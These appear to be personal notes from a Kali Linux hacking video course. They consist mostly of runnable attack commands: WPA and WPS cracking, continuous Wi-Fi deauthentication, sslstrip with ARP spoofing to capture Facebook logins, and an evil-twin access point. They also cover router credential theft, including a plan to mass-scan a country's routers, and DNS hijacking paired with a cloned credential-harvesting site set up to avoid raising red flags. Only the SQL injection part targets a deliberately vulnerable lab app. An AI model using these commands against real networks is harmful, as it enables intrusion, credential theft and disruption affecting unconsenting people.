

---------------------------------------------------
useful commands
---------------------------------------------------

su -			... 	change to root
ctrl+d 			... 	change from root to 
						previous user
---------------------------------------------------
other tutorials
---------------------------------------------------
					
-get wireless adpater to work with kali on vbox					
	-https://www.youtube.com/watch?v=K1ETBeRQBs4

---------------------------------------------------
--	02:51:41 
	Tor browser setup -----------------------------			
---------------------------------------------------

apt-get install tor -y\
adduser nonroot

###################################################
# log as nonroot
# download tor from site
# (be sure that time/date are correct)
# go to downloaded zip and extract
# run 'start tor browser' to see if installed 
# 	correctly
###################################################

---------------------------------------------------
--	03:17:46 
	Proxychains -----------------------------------
---------------------------------------------------

su -

nano /etc/proxychains.conf

###################################################
# comment 			->	strict_chain
# uncomment 		->	dynamic_chain
# add after socks4 	->	socks5 127.0.0.1 9050
# save and exit
###################################################

service tor start

proxychains firefox www.duckduckgo.com

###################################################
# search for 'dns leak test' and assure that 
# ip is different than when not using proxy
# google 	-> free socks5 proxies 
# 			-> go to socks-proxy.net (example)
###################################################

nano /etc/proxychains.conf

###################################################
# set a list of ip's+port from countries that are 
#	known to have strong privacy rules (Russia, 
#	Holland ,...) by adding the first 5 ip's and 
#	port to the end of file (proxy List) 
#	(ex: socks5 10.10.10.10 9050)
# 	save and exit
# 	close browsers using proxychains
###################################################

###################################################
# this should take a lot of time ...
###################################################

proxychains firefox www.duckduckgo.com

---------------------------------------------------
--	3:57:21 
	Virtual private network -----------------------
	(!!! UNFINISHED !!!) --------------------------

	blocked at: 04:02:00 --------------------------
---------------------------------------------------

su -

###################################################
# install plugins
###################################################

apt-get install network-manager-openvpn 
				network-manager-openvpn-gnome 
				network-manager-pptp 
				network-manager-pptp-gnome 
				network-manager-strongswan 
				network-manager-vpnc 
				network-manager-vpnc-gnome -y

###################################################
# set network to be managed
###################################################

nano /etc/NetworkManager/NetworkManager.conf

###################################################
# edit file: managed = true
# save and exit
###################################################

###################################################
# if using a wireless card, and it's not
#	being recognized ( !!! DID NOT WORK !!!)
#	
#	=== (1st time) ===

	1:
	-> vm settings 
	-> USB -> Enable USB1/2/3 Controller 
	-> add usb device filter
	
	2:
	google -> compact wireless kali
	-> locate '2010-06-26-p.tar.bz2' 
	-> save link as
	-> extract
	-> open folder
	-> root@kali: make unload
	-> root@kali: make load
	
	=== (2nd+ time) ===
	
	-> open folder
	-> root@kali: make unload
	-> root@kali: make load

service network-manager restart

---------------------------------------------------
--	4:15:50 
	Changing your mac address with macchanger -----
---------------------------------------------------

###################################################
# get the current mac 
###################################################

macchanger -s eth0

###################################################
# set a random mac
###################################################

macchanger -r eth0

###################################################
# set a random mac with attibutted vendor
###################################################

macchanger -A eth0

###################################################
# set a script to change mac address every minute
###################################################

crontab -e

	* * * * macchanger -A eth0

###################################################	
# save and exit
###################################################

###################################################
# set a script to change mac address on boot time
###################################################

crontab -e
	
	@reboot macchanger -A eth0
	
###################################################	
# save and exit
###################################################

---------------------------------------------------
-- 	4:39:07 
	Footprinting with network mapper (nmap) and ---
	external resources ----------------------------
---------------------------------------------------

###################################################
# major ip blocks: http://www.nirsoft.net/
# info on ip:
#	http://ipinfo.io/
#	https://www.lookip.net/
###################################################

###################################################	
# nslookup: translate dns to ip and reverse
###################################################

nslookup 122.0.0.1
	
###################################################
# for testing, use scanme.nmap.org
###################################################

nmap -vv scanme.nmap.org
	
###################################################	
# scan port 22 (ssh) on a range of ips and send 
#	result to file
###################################################

nmap -oG - 192.168.1.0-255 -p 22 -vv > nmap22Range

###################################################	
# get just the ips that have status 'Up' from
# 	the previous result
###################################################

cat nmap22Range | grep Up | awk -F " " '{print $2}' 
	> nmap22IpsUp

###################################################
# perform a scan on the ips contained in the file
#	'nmap22IpsUp'
###################################################

nmap -vv -iL nmap22IpsUp

###################################################	
# get ip info of scanme.nmap using curl on json 
#	format
###################################################

curl ipinfo.io/74.207.244.221

###################################################
# nmap scripts:
# https://nmap.org/nsedoc/scripts/http-methods.html
###################################################

---------------------------------------------------
--	5:26:19 
	Attacking wireless networks cracking WPA/WPA2 -
---------------------------------------------------


---------------------------------------------------
--	5:41:33 
	Aircrack-ng & reaver installation -------------
---------------------------------------------------

---------------------------------------------------
--	5:54:17 
	Installing aircrack-ng on Windows & -----------
	Crunch on Linux -------------------------------
---------------------------------------------------

---------------------------------------------------
--	6:05:52 
	Aircrack-ng & crunch hacking example ----------
	(!!! UNFINISHED !!!) --------------------------

	blocked at: 06:42:00 --------------------------
	BECAUSE COMMANDS KILL NETWORK -----------------
---------------------------------------------------

###################################################
# set network adapter to work from promiscuous 
# 	mode to monitor mode; the difference is 
#  	in premiscuous mode the network card 
#	only accepts packets that sent to 
# 	my network card. In monitor mode,
#	it accepts everything.
###################################################

	ifconfig wlan0 down 
	iwconfig wlan0 mode monitor
	if config wlan0 up

###################################################
# list programs that could interfere with the
#	wireless card.
###################################################

	airmon-ng check wlan0

###################################################
# if there are results, like:
###################################################

	PID		Name
	1316	NetworkManager
	1536	wpa_suplicant
	2356	dhclient

###################################################
#	start by killing the networkmanager, 
#	then the dhclient, then
#	the others in any order.
###################################################

	kill 1316
	kill 1536

###################################################
# or, ...
###################################################

	airmon-ng check kill

###################################################
# confirm there are no processes that could
# 	interfere.
###################################################

	airmon-ng check wlan0

###################################################
# start monitoring
###################################################

	airodump-ng wlan0

###################################################
# conduct a more precise scan and write to file:
#
#	1: choose a ssid 
#		-> NOS-52E0
#	2: get the channel (column CH) 
#		-> value: 3
#	3: get the BSSID (column BSSID) 
#		-> access point mac address 
#		-> value: A8:4E:3F:30:52:E8
###################################################

	airodump-ng -c 3 -w scan_test --bssid A8:4E:3F:30:52:E8 wlan0
	
###################################################
# perform a deauthentication attack on previous access point:
#
# 	A Wi-Fi deauthentication attack is a type of 
# 	denial-of-service attack that targets 
# 	communication between a user and a 
#	Wi-Fi wireless access point. 
# 	https://en.wikipedia.org/wiki/Wi-Fi_deauthentication_attack
###################################################

	aireplay-ng -0 0 -a A8:4E:3F:30:52:E8 -c D0:27:88:6E:77:70 wlan0 

###################################################
# Where:
#
# 	-> -0 means deauthentication
#   ->  0 means send them continuously; 
#		1 is the number of deauths to send 
#		(you can send multiple if you wish); 		
#   -> -a 00:14:6C:7E:40:80 is the MAC address 
#		of the access point
#   -> -c 00:0F:B5:34:30:30 is the MAC address 
#		of the client to deauthenticate; 
#		if this is omitted then all clients are 
#		deauthenticated 
#	-> wlan0 is the interface name
###################################################

###################################################
# (E1) - possible error: 
#
#	'wlan0 is on channel 8, 
#	but the AP uses channel 3'
###################################################

###################################################
# (S1) - solution:
#
#	change wlan0 channel from 8 to 3
#	but this approach brings a different problem: 
#		on my live version on the laptop 
#		'ifconfig wlan0 up' doesn't 
#		restore network access.
#		as a consequence, aireplay doesn't work
###################################################

	ifconfig wlan0 down
	iwconfig wlan0 mode monitor
	iwconfig wlan0 channel 3
	ifconfig wlan0 up
	airodump-ng -c 3 -w capture --bssid A8:4E:3F:30:52:E8 wlan0
	aireplay-ng -0 0 -a A8:4E:3F:30:52:E8 -c D0:27:88:6E:77:70 wlan0 
	crunch 11 11 -t %123% 1234567890 | aircrack-ng -w capture.cap -e NOS-52E0

###################################################
#	
# 	alternative way to crack access point password:
#
#	source:
#	https://www.youtube.com/watch?v=-186zN44AdE
#
# 	( !! THIS ALSO KILLS NETWORK ACCESS !! )
#
###################################################

	airmon-ng check kill
	airmon-ng start wlan0 
	airodump-ng wlan0mon
	airodump-ng -c 3 -w capture --bssid A8:4E:3F:30:52:E8 wlan0mon
	aireplay-ng -0 5 -a A8:4E:3F:30:52:E8 -c D0:27:88:6E:77:70 wlan0mon 
	crunch 11 11 -t %123% 1234567890 | aircrack-ng -w capture.cap -e NOS-52E0

---------------------------------------------------
--	Cracking WPS pins with reaver 
	
 	6:48:03 pt.1 
	
	7:03:27 pt.2 
	
	7:14:09	pt.3 ----------------------------------
---------------------------------------------------

###################################################
# Kali Linux Wash is a tool to find WPS enabled 
# routers in your area
###################################################

###################################################
# enable monitoring
###################################################

airmon-ng check kill
airmon-ng start wlan0

# or ...

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

###################################################
# search for routers with wps enabled
###################################################

wash -i wlan0mon

###################################################
# if there's an error:
###################################################

mkdir /etc/reaver

###################################################
# check target router signal strength
###################################################

airodump-ng wlan0mon

###################################################
# crack wpa/wpa2 password
#
# it can take a lot of time
#
###################################################

reaver -b <router.mac.addr> -i wlan0mon -c 1 -vv

###################################################
# if this warning appears:
#
# 	'detected ap rate limiting, waiting xx 
#	seconds before re-checking'
#
#	use the following to circunvent:
#	
#	reaver -> do x pins by y seconds 
#		(ex: x = 2, y = 60); change
#		them as necessary
#
###################################################

reaver -b <router.mac.addr> -i wlan0mon -c 1 -r 2:60 -vv

###################################################
#
# 	a way of knowing the default pin for a router
#	is running a script (ex: pingen.py).
#	they are based on the fact that
#	each brand has an algorithm 
#	for generating the default
#	pin. And since most people
#	don't chance it ...
#	
###################################################

./pinGen.py <router.mac.addr>

---------------------------------------------------
--	7:30:34 
	Performing denial of service attacks 
	on wireless networks pt.1 ---------------------
---------------------------------------------------

###################################################
#
#	start monitor mode
#
###################################################

airmon-ng check kill
airmon-ng start wlan0 

###################################################
#
#	compare target channel and mine interface
#
###################################################

airodump-ng wlan0mon
iwlist wlan0mon channel

###################################################
#
#	change interface channel if different
#
###################################################

iwconfig wlan0mon channel <1-13>

###################################################
#
#	deauth all
#
###################################################

aireplay -0 0 -a <router.mac.addr> wlan0mon

---------------------------------------------------
--	7:43:48 
	Performing denial of service attacks 
	on wireless networks pt.2 ---------------------
---------------------------------------------------

###################################################
#
#	see clients connected to ap
#
###################################################

airodump-ng --bssid <router.mac> wlan0mon

# 	or 
#	nmap -sS -O <router.ip>/<cidr>

nmap -sS -O 192.168.1.1/24

###################################################
#
#	!!!
#	problem: airodump doesn't show any stations 
#	connected to router
#
#	alternative: nmap -sS -O <router-ip>/<cidr>
#
###################################################

###################################################
# dos script: see kali pen 
#				-> delgadillo-youtube-s1- dos.sh
###################################################

###################################################

---------------------------------------------------
--	8:01:44 
	SSL strip pt.1 --------------------------------
---------------------------------------------------

---------------------------------------------------
--	8:10:33 
	SSL strip pt.2 --------------------------------
---------------------------------------------------

###################################################
#
#	enable ip forwarding
#	redirect
#	see list of rules
#	get default gateway
#	scan for target host and ports on network
#
#
###################################################

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 -v
iptables -t nat -L PREROUTING
route # gateway: 192.168.1.1
nmap 192.168.1.1/24 -vv # target: 192.168.1.10

###################################################
#
#	iptables -t nat ...
#
#	where:
#	-t 		->	table to manipulate
#	-A 		-> 	append to chain
#	-p 		->	protocol
#	-j 		->	target for rule (??)
#	to-port	->	port where ssl will be listening
#
###################################################

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!
!! Browsers don't work with arpspoof or sslstrip running
!!
!!	solution 1 : DID NOT WORK
	alternative: JackkTutorials
	How to use SSLStrip (Hack Facebook/Twitter) 
	https://www.youtube.com/watch?v=LnbLRX83dzU
	
		echo 1 > /proc/sys/net/ipv4/ip_forward
		iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 -v
		# get the gateway ip for destination 0.0.0.0
		# gateway: 192.168.1.1/24
		route -n
		# scan machines connected to gateway and get the target ip 
		# target: 192.168.1.10
		nmap -sS -O 192.168.1.1/24
		# arp spoof
		arpspoof -i wlan0 -t 192.168.1.10 192.168.1.1
		# on a new tab/window, listen on port 8080
		sslstrip -l 8080
		# go to facebook and confirm that is http and not https
		# try a login on facebook
		cat sslstrip.log

!! 	solution 2 : DID NOT WORK
!!	https://forums.hak5.org/index.php?/topic/32299-ssl-strip-arpspoof-no-internet/
!!
!! 		change port: 10.000 instead of 8080
!!		use: ettercap -T -q -i wlan0
!!
!!		iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
!!		arpspoof -i wlan0 192.168.1.1
!!		ettercap -T -q -i wlan0
!!		sslstrip -a -k -f
!!		cat sslstrip.log
!!
!! 	solution 3 : DID NOT WORK
!! 	JackkTutorials
!!	How to use sslstrip2 and dns2proxy (Chrome/Firefox SSLStrip
!!	https://www.youtube.com/watch?v=9RPCSVcCv1w&t=362s
!!
!!		# download sslstrip2: https://github.com/byt3bl33d3r/sslstrip2
!!		# download dns2proxy: https://github.com/LeonardoNve/dns2proxy
!!
!!		apt-get update
!!		apt-get upgrade
!!
!!		cd ~/Downloads/sslstrip2-master
!!		python setup.py install
!!		echo 1 > /proc/sys/net/ipv4/ip_forward
!!		iptables --flush
!!		iptables --flush -t nat
!!		iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
!!		iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
!!		route -n # get gateway ip: 192.168.1.1
!!		nmap -sS -O 192.168.1.1/24 # get target -> 192.168.1.10
!!
!!		cd ~/Downloads/dns2proxy-master
!!		python dns2proxy.py
!!		# open new tab
!!		sslstrip -l 9000
!!		# open new tab
!!		arpspoof -i wlan0 -t 192.168.1.10 192.168.1.1 # convince the targer that i'm the router
!!		# open new tab
!!		arpspoof -i wlan0 -t 192.168.1.1 192.168.1.10 # convince the router that i'm the target
!!		# should have 4 tabs running: dns2proxy, sslstrip, arpspoof * 2
!!		# go to facebook and confirm that is http and not https
		# try a login on facebook
		cat sslstrip.log
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

---------------------------------------------------
--	8:21:11 
	SSL strip pt.3 --------------------------------
---------------------------------------------------

# new tab
# convince the router that i'm the target
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.10 

# new tab
# convince the target that i'm the router
arpspoof -i wlan0 -t 192.168.1.10 192.168.1.1 

# new tab
# open port 8080 for ssl strip to listen if closed
cat /etc/services | grep 8080
iptables -I INPUT 1 -p tcp --dport 8080 -j ACCEPT
iptables -L INPUT
sslstrip -l 8080

# new tab
tail -f sslstrip.log

# #################
# SSL Strip: resume
# #################

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 -v
iptables -t nat -L PREROUTING
route # gateway: 192.168.1.1
nmap 192.168.1.1/24 -vv # target: 192.168.1.10
# new tab
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.10 
# new tab
arpspoof -i wlan0 -t 192.168.1.10 192.168.1.1 
# new tab
cat /etc/services | grep 8080
iptables -I INPUT 1 -p tcp --dport 8080 -j ACCEPT
iptables -L INPUT
sslstrip -l 8080
# new tab
tail -f /boot/sslstrip.log

---------------------------------------------------
--	8:39:24 
	Funny things pt.1 -----------------------------
---------------------------------------------------

apt-cache search squid3 
apt-cache search apache2 

apt-get install squid3 
apt-get install apache2 

#  	imagemagick: 
#	software suite for displaying, converting, 
#	and editing raster image and vector image files. 

#	ghostscript:  
#	rasterization or rendering of such page 
#	description language files, for the display or 
#	printing of document pages, and the conversion 
#	between PostScript and PDF files.

#	jp2a: 
#	converts JPG images to ASCII

apt-get install imagemagick ghostscript jp2a

---------------------------------------------------
--	8:46:28
	Funny things pt.2 -----------------------------
---------------------------------------------------

#	get googlesearch.pl script:
#	https://raw.githubusercontent.com/linvex/squid-scripts/master/googleSearch.pl

touch google-search.pl
gedit google-search.pl
chmod +x google-search.pl



nano google-search.pl

#	change $ourIP to my ip

nano /etc/squid3/squid.conf

#	uncomment this line:
#		acl localnet src 192.168.0.0/24
#		http_access allow localnet
#	change this line to:
#		http_port 3128 transparent
#	add to end:
#		url_rewrite_program /<path-to>/googleSearch.pl

service squid3 restart

---------------------------------------------------
--	8:58:40
	Funny things pt.3 -----------------------------
---------------------------------------------------

iptables -t nat -A PREROUTING -i wlan0 -p tcp --destination-port 80 -j REDIRECT --to-port 3128
echo 1 > /proc/sys/net/ipv4/ip_forward

#	apache configuration
mkdir /var/www/tmp
chmod 777 /var/www/tmp

service apache2 restart

# 	start spoofing
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.10 
# 	new tab
arpspoof -i wlan0 -t 192.168.1.10 192.168.1.1 

# 	on the target machine:
#	go the a search engine (bing, google, ...)
#	see that whatever i enter will be appended 
# 		with $extraText from googleSearch.pl

#	if i edit googleSearch.pl, restart squid 

service squid3 restart

---------------------------------------------------
--	9:17:02
	Evil twin pt.1 --------------------------------
	(!!! UNFINISHED !!!) --------------------------
	errors when trying to install a 2nd nic -------
---------------------------------------------------



#	goal: clone an access point and redirect all
#	traffic to it.

###################################################
#	start monitor mode
###################################################

airmon-ng check kill
airmon-ng start wlan0 

###################################################
#	scan access points and get the mac address
#	of the router to clone
###################################################

airodump-ng wlan0mon 

###################################################
#	compare interface channel with routers' and 
#	change if different
###################################################

iwlist wlan0mon channel
iwconfig wlan0mon channel <1-13>

###################################################
#	clone
#	airbase-ng -a <router.mac.addr> --essid "<router.essid>" -c <router.channel> wlan0mon 
###################################################

airbase-ng -a 00:14:6C:7E:40:80 --essid "NOS-52E0" -c 1 wlan0mon 

###################################################
#	deauth all clients on the access point;
#	confirm that there are clients 
#	being reassociated
###################################################

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 wlan0mon

---------------------------------------------------
--	9:27:37
	Evil twin pt.2 --------------------------------
---------------------------------------------------

###################################################
#	by now, clients reassociated don't have
#	network access until a bridge in
#	configured.
#
#	install utils
#
###################################################

sudo apt-cache search bridge-utils
sudo apt-get install bridge-utils -y

###################################################
#
#	if apt-get install returns '... not found ...':
#	
#	start by adding to /etc/apt/sources.list:
#
#	deb http://http.kali.org/kali kali main non-free contrib
#	deb-src http://http.kali.org/kali kali main non-free contrib
#
#	and then run:
#
#	apt-get update
#	apt-get install bridge-utils
###################################################

brctl show

###################################################
#	create a bridge
###################################################

brctl addbr evilBridge

###################################################
#	associate the bridge with my network interface
#	!!
#	i think that the interface can't be the one
#	on monitor mode because that can't 
#	be used to browse;
#
#	a solution migth be an interface that supports
#	monitor mode:
#	-https://null-byte.wonderhowto.com/forum/monitor-mode-kills-wifi-kali-linux-0163630/
###################################################

brctl addif evilBridge wlan0mon

###################################################
#	connect another network card (wlan1) and
#	add it to the bridge
#
#	problem 1: kali connect 2 wireless interfaces to same network
#		-insert interface cd and install
#	problem 2: keep 1 connection up while the other
#		is being used by aireplay to deauth
###################################################

brctl addif evilBridge wlan1 

###################################################
#	get the interface created by airbase (at0)
#	add it to the bridge;
###################################################

brctl addif evilBridge at0

###################################################
#	add ip's to the interfaces and change
#	their state to up 
###################################################

ifconfig at0 0.0.0.0 up
ifconfig evilBridge up 
dhclient3 evilBridge &
	or
	dhclient3 evilBridge
	or 
	dhclient evilBridge

---------------------------------------------------
--	9:35:05
	Evil twin pt.3 --------------------------------
---------------------------------------------------
	
###################################################
#	browse with another device and 
#	listen with wireshark:
#	use the 'dns' filter to confirm the 
#	site requested
###################################################	
	
---------------------------------------------------
--	9:46:24 
	Using known vulnerabilities pt.1 --------------
---------------------------------------------------	
	


###################################################
exploit.db.com:

Allows to search for vulnerabilities given some 
data
example:  
given router model reference, the db can say
that the router password can be changed with
get method.

checks for vulnerabilities in my router using:
-exploit.db.com
-google search
###################################################	
	
---------------------------------------------------
--	9:56:04 
	Using known vulnerabilities pt.2 --------------
---------------------------------------------------		
	
###################################################	
#	stealing credentials from router by
#	exploiting rom-0 vulnerabilities
#	more info: 
#	https://k0st.wordpress.com/2015/07/05/identifying-and-exploiting-rom-0-vulnerabilities/
###################################################	

apt-install wget

wget http://192.168.1.1/rom-0 

###################################################	
# 	see the name of binary file generated (rom-0.1)
###################################################	

less rom-0.1 

###################################################	
# 	decompress the rom file:
#	'ZTE, TP-LINK, ZynOS, Huawei rom-0 Configuration Decompressor'
#	https://packetstormsecurity.com/files/127049/ZTE-TP-Link-ZynOS-Huawei-rom-0-Configuration-Decompressor.html
#	https://github.com/masbog/rom-0-Configuration-Decompressor
#
#	also in scripts folder
#
###################################################	

./rom-0-decomp.py rom-0

---------------------------------------------------
--	10:05:25
	Using known vulnerabilities pt.3 --------------
---------------------------------------------------		

###################################################	
# 	The idea is to get a router credentials 
#	without being connected to him or
#	knowing the ip.
#
# 	1-mass scan routers on a wide area (ex: country)
#		and get their ips 	
# 	2-scan each ip with nmap and a script; if a 
#		vulnerability is found, the credentials would
# 		be pulled
#	3-search for bssid's around and see if there are
#		matches with result from previous step.
#
#
###################################################	

###################################################	
# 	go to nmap site on 'http-tplink-dir-traversal': 
#	https://nmap.org/nsedoc/scripts/http-tplink-dir-traversal.html
#	
#	Explanation:
#	'Exploits a directory traversal vulnerability 
#	existing in several TP-Link wireless routers. 
#	Attackers may exploit this vulnerability to 
#	read any of the configuration and password 
#	files remotely and without authentication.'
###################################################	

###################################################	
#	Locate nmap scripts location:
###################################################	

locate *.nse
	
###################################################	
#	probable result: /usr/share/nmap/scripts
###################################################	

cd /usr/share/nmap

###################################################	
#	check to see if the needed script already exists
###################################################	

ls scripts/http-tplink-dir-traversal.nse
cat scripts/http-tplink-dir-traversal.nse

###################################################	
#	If it doesn't exist, download script from:
#	https://svn.nmap.org/nmap/scripts/http-tplink-dir-traversal.nse
#
#	save file as 'http-tplink-dir-traversal.nse'
#	in /usr/share/nmap/scripts
###################################################	
	
nmap -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/etc/topology.conf -d -n -Pn <target.ip>	
	
# 	or	
	
nmap -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/tmp/ath0.ap_bss -d -n -Pn <target.ip>		

#	where:
#	target.ip: router ip
	
###################################################	
#	search for :
#	wpa_passphrase
#	wps_default_pin
###################################################	
	
---------------------------------------------------
--	10:24:20 
	Post authentication exploitation (DNS) pt.1 ---
---------------------------------------------------	
	
###################################################	
 	1-login to router to be exploited
	2-set dns:
		-relay to:
			'use user discovered dns server only'
		-primary dns server
			-my machine (get a vpn static address)
		-secondary dns server
			-8.8.8.8
	
	the 2nd dns server exists so that
	no red flags are raised when an
	attack is not taking place.
###################################################	
	
---------------------------------------------------
--	10:33:58
	Post authentication exploitation (DNS) pt.2 ---
---------------------------------------------------	

###################################################	
#	get my ip
###################################################	

ifconfig
> 192.168.1.102

###################################################	
#	run dnschef
###################################################	

dnschef --fakeip=192.168.1.102 --fakedomains=linuxquestions.org --interface=192.168.1.102

###################################################	
#	where:
#
#	fakeip: 		can be a vpn server
#	fakedomains:	can read from file
#	interface:		can be 0.0.0.0 (all ip's on local machine)
###################################################	

###################################################	
#	clone a site and store it on our web server
#	(apache will be executed automatically)
###################################################	

setoolkit
> social engineering attacks 
> website attack vectors
> credential harvester attack method
> site cloner
> ip address for the post back in harvester/tabnabbing: 192.168.1.102
> enter the url to clone: http://www.linuxquestions.org
> wait ...
> press 99 until exit

###################################################	
#	put my ip on url bar and confirm that site 
#	as been cloned
###################################################	

> 192.168.1.102

---------------------------------------------------
--	10:46:20
	Post authentication exploitation (DNS) pt.3 ---
---------------------------------------------------

###################################################	
#	live feed:
#
#	live feed of what's going on the server;
#	as soon as i get password, kill the 
#	dns server so that target doesn't 
#	have to go by my dns server.
###################################################	

cd /var/www
tail -f harvester_<date><time>.txt

> go to linuxquestions.org
> enter credentials 
> confirm that the live feed has the credentials
	
###################################################	
#	if the browser has cached the dns for the site,
#	the attack will only work when target:
#	-deletes browsing history
#	-restarts browser
###################################################	
	
###################################################	
#	if the site is broken:
#	-delete everything in /var/www
#	-restart the process
###################################################		
	
---------------------------------------------------
--	11:00:01 
	SQL injection pt.1 ----------------------------
---------------------------------------------------	
	
###################################################		
#	download Damn Vulnerable Web Application (DVWA):	
#	http://www.dvwa.co.uk/
#
#	ATTENTION: the tests don't work on php7
#
#	good source:
#		jackk tutorials
#		https://www.youtube.com/watch?v=5BG6iq_AUvM
#
###################################################		

rm /var/www/html/index.html
cp -Rv ~/Downloads/DVWA-master /var/www/html
	
---------------------------------------------------
--	11:12:34
	SQL injection pt.2 ----------------------------
---------------------------------------------------	
	
#	allow site to be accessed

cd /var/www/html/DVWA-master/config
cp config.inc.php.dist config.inc.php
gedit config.inc.php
sudo chmod -Rv 774 /var/www/html/DVWA-master
sudo chown -R www-data:www-data /var/www/html/DVWA-master

#	install mysql & start it

apt-cache search mysql | grep -i database | less

apt-get install mysql-client
apt-get install mysql-server

service mysql start
	
mysql -h localhost -u root

mysql> set password for root@localhost=password('123456');

mysql -h localhost -u root -p123456

service mysql status

#	install apache2 & start it

service apache2 restart
	
---------------------------------------------------
--	11:27:20
	SQL injection pt.3 ----------------------------
---------------------------------------------------		

#	go to localhost/DVWA-master/setup.php and 
#	correct errors shown in red

#	error 1:
#	reCAPTCHA key: not found
#	solution: 
#	generate public & private keys for re-captcha
#	following the link on config.inc.php:
#	https://www.google.com/recaptcha/admin/create

gedit /var/www/html/DVWA-master/config/config.inc.php

#	error 2:
#	PHP function allow_url_include: Disabled
#	solution:
#	set allow_url_include to On

locate php.ini
php -i
gedit /etc/php/7.0/apache2/php.ini
sudo service apache2 restart

#	error 3:
#	does not accept php7.x;
#	solution 1 ( -- NOT TESTED -- ):
#	install php5.6

sudo apt-get install software-properties-common
sudo add-apt-repository ppa:ondrej/php
sudo apt-get update
sudo apt-get install php7.0 php5.6 php5.6-mysql php-gettext php5.6-mbstring php-mbstring php7.0-mbstring php-xdebug libapache2-mod-php5.6 libapache2-mod-php7.0

sudo a2dismod php5.6
sudo a2enmod php7.0
sudo service apache2 restart

#	error 3:
#	does not accept php7.x;
#	solution 2 ( -- NOT TESTED -- ):
#	install php5.6

apt-get update
sudo apt-get install software-properties-common
#apt-get install python-software-properties
add-apt-repository -y ppa:ondrej/php
apt-get update
apt-get install php5.6-fpm
php -v
mv /usr/bin/php /usr/bin/php7
mv /usr/bin/php 5.6 /usr/bin/php
php -v
service apache2 restart

#	error 4:
#	PHP module gd: Missing

sudo apt-get update
sudo apt-get php7.0-gd
sudo apt-get upgrade
sudo apt-get update
sudo service apache2 restart

#	click button 'CREATE / RESET DATABASE'
#	message should appear that tables were created

#	confirm database exists

sudo mysql -h localhost -u root -p123456
mysql > select databases;
mysql > use dvwa;
mysql > show tables;

#	get credentials & login 
#	admin;password

less /var/www/DVWA-master/READ_ME

#	login

# 	go to 'DVWA Security' > set to high level

#	launch burpsuite 

burpsuite

#	go to burpsuite > 'proxy' > 'options' 
	> make sure localhost is selected

#	go to burpsuite > 'proxy' > 'intercept' 
	> make sure is on

#	go to browser > edit > preferences > advanced 
	> network > settings 
	> manual proxy configuration 
	> http proxy: 127.0.0.1 
		& port: 8080 
		& use this proxy server for all protocols

#	go to 'dvwa' > 'sql injection (blind)' > insert data > submit

#	on burpsuite, 
	- check that on 'proxy' > 'intercept' info has appeared
	- action > copy url to notepad
	- on the raw tab > copy the phpsessid to notepad
	
#	close burpsuite

# 	reload 'dvwa' > 'sql injection (blind)';
	it should return 'the proxy server is 
	refusing connections'

#	go to browser > edit > preferences > advanced 
	> network > settings 
	> use system proxy settings
	
# 	reload 'dvwa' > 'sql injection (blind)';
	it should return to normal
	
---------------------------------------------------
--	11:40:42
	SQL injection pt.4 ----------------------------
---------------------------------------------------	

#	in the tutorial there is no 'user_token' get param;
#	but in my case there is
	
sqlmap -u "<url>#" --cookie="security=high; PHPSESSID=<phpsessid>"
	
#	where:
#	phpsessid: 	on notepad & comes from previous chapter
#	url: 		on notepad & comes from previous chapter;
#				is the url shown after submitting form 
#				on 'dvwa' > 'sql injection (blind)'
	
#	if it doesn't work, try :
	-changing security to low/medium	
	-change browser 
		-or
		-clean browser history
		-clean cookies
		-repeat the process
	
#	log files are at '/root/.sqlmap/output/<ip>	
	
#	get available databases:
#	(if returns errors, change security=low)

sqlmap -u "<url>#" --cookie="security=high; PHPSESSID=<phpsessid>" --dbs	
	
#	get db tables

sqlmap -u "<url>#" --cookie="security=high; PHPSESSID=<phpsessid>" -D dvwa --tables	
	
#	get db table columns

sqlmap -u "<url>#" --cookie="security=high; PHPSESSID=<phpsessid>" -D dvwa -T users --column

#	or	

sqlmap -u "<url>#" --cookie="security=high; PHPSESSID=<phpsessid>" -T users --column

---------------------------------------------------
--	11:52:06
	SQL injection pt.5 ----------------------------
---------------------------------------------------	

#	get db table columns data & 
#	crack encrypted results

sqlmap -u "<url>#" --cookie="security=high; PHPSESSID=<phpsessid>" -D dvwa -T users -C user, password --dump

#	or	

sqlmap -u "<url>#" --cookie="security=high; PHPSESSID=<phpsessid>" -C user, password --dump

#	i will be prompted with questions:
#
#	1-store hashes?					-> No
#	2-crack them with dictionary?	-> Yes
#	3-what dictionary?				-> Default
#	4-use common suffixes?			-> No
#	... Cracking ...
#	5-crack them with dictionary?	-> Yes

#	Results decrypted should be shown

---------------------------------------------------
--	12:09:02
	Brute force methods for cracking passwords – --
	cracking hashes -------------------------------
---------------------------------------------------	

** start here **

#	crack md5 hash	
#
#	go to:
#	http://www.md5hashgenerator.com/
#	input:	123a
#	output:	1552c03e78d38d5005d4ce7b8018addf
#	input:	f4gt
#	output:	3c76d05512d1f8ca9e2edd18fe90aab3

findmyhash MD5 -h 1552c03e78d38d5005d4ce7b8018addf

#	also try using -g (google):

findmyhash MD5 -g 1552c03e78d38d5005d4ce7b8018addf

---------------------------------------------------
--	12:21:06
	Cracking linux passwords with john the ripper -
	pt.1 ------------------------------------------
---------------------------------------------------	

###################################################
#	get root access and change password
###################################################

#	reboot kali

# 	window appears with 2 options:
#	1-kali gnu/linux, with linux ...
#	2-kali gnu/linux, with linux ... (recovery mode)

#	move arrow up/down to the 1st option and press 'e'

#	on the line that says:
#	linux /boot/vmlinus ... ro ...
#	1.replace 'ro' with 'rw'
